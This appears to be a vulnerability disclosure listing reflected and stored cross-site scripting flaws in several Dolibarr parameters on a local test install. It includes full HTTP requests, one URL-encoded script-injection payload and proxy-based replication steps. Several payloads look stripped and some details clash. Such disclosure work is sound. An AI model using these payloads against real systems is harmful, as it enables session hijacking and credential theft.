+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_optimize_smallscreen request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19600">6f8bd was submitted in the dol_optimize_smallscreen parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. 
+ +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=19600">6f8bd&dol_no_mouse_hover=&dol_use_jmobile=&username=test&password=123qwe%2C.%2F + +Affected parameter(s): dol_optimize_smallscreen + +Steps to replicate: +16. Open Dolibarr application in browser. +17. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +18. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +19. Manipulate dol_optimize_smallscreen parameter value with payload 19600">6f8bd and submit the request and see the output in browser +20. 
This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the dol_use_jmobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88791">d1066 was submitted in the dol_use_jmobile parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/index.php?mainmenu=home HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/ +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 + +token=cdc88516f780d87f909672aa6046513f&loginfunction=loginfunction&tz=&tz_string=&dst_observed=&dst_first=&dst_second=&screenwidth=&screenheight=&dol_hide_topmenu=&dol_hide_leftmenu=&dol_optimize_smallscreen=&dol_no_mouse_hover=&dol_use_jmobile=88791">d1066&username=test&password=123qwe%2C.%2F + +Affected parameter(s): 
dol_use_jmobile + +Steps to replicate: +21. Open Dolibarr application in browser. +22. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +23. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +24. Manipulate dol_use_jmobile parameter value with payload 88791">d1066 and submit the request and see the output in browser +25. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. 
An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon + +Vulnerability Name: Cross-site scripting (reflected) + +Severity: Critical + +URL: http://localhost/dolibarr/index.php +Affected Users: All authenticated users + +Issue details: The value of the mainmenu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e was submitted in the mainmenu parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. 
+ +HTTP request: +GET /dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost:8082/dolibarr/index.php?mainmenu=home&leftmenu= +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive + +Affected parameter(s): mainmenu + + + + + +Steps to replicate: +26. Open Dolibarr application in browser. +27. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +28. After starting tamper data addon, fill login details and click on connection button to login into application and intercept the request +29. Manipulate mainmenu parameter value with payload %2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e +or submit http://localhost/dolibarr/index.php?mainmenu=home%2d%2d%3e%3c%2f%73%43%72%49%70%54%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%36%36%32%36%29%3c%2f%73%43%72%49%70%54%3e&leftmenu=&optioncss=print in address bar and see the output in browser +30. 
This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon +? +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea68">13228 was submitted in the email parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update 
+-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + +bea68">13228 +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): email + +Steps to replicate: +1. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +2. 
Click on modify to modify the user details +3. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +4. After starting tamper data addon, click on save to save the user details and intercept the request +5. Manipulate email parameter value with payload bea68">13228 and submit the request and see the output in browser +6. This input was echoed unmodified in the application's response that is the proof of vulnerability + + +Screenshot: + + Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. 
An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the firstname request parameter is copied into the HTML document as plain text between tags. The payload 60b01f17dd was submitted in the firstname parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. 
+ +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test160b01f17dd +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ 
+-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): firstname + +Steps to replicate: +7. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +8. Click on modify to modify the user details +9. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +10. After starting tamper data addon, click on save to save the user details and intercept the request +11. Manipulate firstname parameter value with payload test160b01f17dd and submit the request and see the output in browser +12. 
This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. 
+Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the job request parameter is copied into the HTML document as plain text between tags. The payload 5db8ea0840 was submitted in the job parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. + +HTTP request: +POST /dolibarr/user/fiche.php?id=2 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit +Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=---------------------------89552749915619 +Content-Length: 2023 + +-----------------------------89552749915619 +Content-Disposition: form-data; name="token" + +4e3018ee618da95bccb8c38845a4f027 +-----------------------------89552749915619 +Content-Disposition: form-data; name="action" + +update +-----------------------------89552749915619 +Content-Disposition: form-data; 
name="entity" + +1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="photo"; filename="" +Content-Type: application/octet-stream + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="firstname" + +test1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="job" + + 5db8ea0840 +-----------------------------89552749915619 +Content-Disposition: form-data; name="login" + +test +-----------------------------89552749915619 +Content-Disposition: form-data; name="password" + +123qwe,./ +-----------------------------89552749915619 +Content-Disposition: form-data; name="admin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="superadmin" + +0 +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_phone" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="user_mobile" + + +-----------------------------89552749915619 +Content-Disposition: form-data; name="office_fax" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="email" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="signature" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="fk_user" + +-1 +-----------------------------89552749915619 +Content-Disposition: form-data; name="accountancy_code" + +-----------------------------89552749915619 +Content-Disposition: form-data; name="save" + +Save +-----------------------------89552749915619-- + +Affected parameter(s): firstname + +Steps to replicate: +13. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card". +14. Click on modify to modify the user details +15. Start any interception tool to intercept the request i.e. 
tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon. +16. After starting tamper data addon, click on save to save the user details and intercept the request +17. Manipulate job parameter value with payload 5db8ea0840 and submit the request and see the output in browser +18. This input was echoed unmodified in the application's response that is the proof of vulnerability + +Screenshot: + +Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: +• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized. +• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). +In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task. +Issue background: Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. 
An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. +Tools used: Mozilla Firefox browser and Tamper Data Addon +Vulnerability Name: Cross-site scripting (Stored) + +Severity: Critical + +URL: http://localhost/dolibarr/user/fiche.php +Affected Users: Authenticated user and admins + +Issue details: The value of the lastname request parameter is copied into the HTML document as plain text between tags. The payload fc1ddbaf03 was submitted in the lastname parameter. This input was echoed unmodified in the application's response. + +This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. 
+HTTP request:
+POST /dolibarr/user/fiche.php?id=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/dolibarr/user/fiche.php?id=2&action=edit
+Cookie: mp_5e17e15e77e349ee2850bffcebb7cdeb_mixpanel=%7B%22distinct_id%22%3A%20%22144d6cce6fc4b0-0010965be81e618-45564137-100200-144d6cce6fd4c5%22%2C%22%24initial_referrer%22%3A%20%22http%3A%2F%2Flocalhost%2Fmyreportmanager%2F%22%2C%22%24initial_referring_domain%22%3A%20%22localhost%22%7D; __atuvc=38%7C15; SESS2f090b9824406e4362345a00f588b0ff=V7rHt4JgSz2U5BlEwtMcAtf53OtKRt0mhSfrFrb3n-w; DOLSESSID_636e2e420d10c4a9056d9a4aacf317fb=34g5b7ckocvhn7ubkadjr47n55
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------89552749915619
+Content-Length: 2023
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="token"
+
+4e3018ee618da95bccb8c38845a4f027
+-----------------------------89552749915619
+Content-Disposition: form-data; name="action"
+
+update
+-----------------------------89552749915619
+Content-Disposition: form-data; name="entity"
+
+1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="lastname"
+
+testfc1ddbaf03
+-----------------------------89552749915619
+Content-Disposition: form-data; name="photo"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="firstname"
+
+test1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="job"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="login"
+
+test
+-----------------------------89552749915619
+Content-Disposition: form-data; name="password"
+
+123qwe,./
+-----------------------------89552749915619
+Content-Disposition: form-data; name="admin"
+
+0
+-----------------------------89552749915619
+Content-Disposition: form-data; name="superadmin"
+
+0
+-----------------------------89552749915619
+Content-Disposition: form-data; name="office_phone"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="user_mobile"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="office_fax"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="email"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="signature"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="fk_user"
+
+-1
+-----------------------------89552749915619
+Content-Disposition: form-data; name="accountancy_code"
+
+
+-----------------------------89552749915619
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------89552749915619--
+
+Affected parameter(s): lastname
+
+Steps to replicate:
+19. Login into Dolibarr application with any user and go to "Users & Group" --> "User Card".
+20. Click on modify to modify the user details
+21. Start any interception tool to intercept the request i.e. tamper data mozilla addon, burp suite, owasp zap etc. I have used mozilla firefox browser and tamper data addon.
+22. After starting tamper data addon, click on save to save the user details and intercept the request
+23. Manipulate lastname parameter value with payload fc1ddbaf03 and submit the request and see the output in browser
+24. 
This input was echoed unmodified in the application's response that is the proof of vulnerability
+
+Screenshot:
+
+Remediation detail: In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
+• Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
+• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
+In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
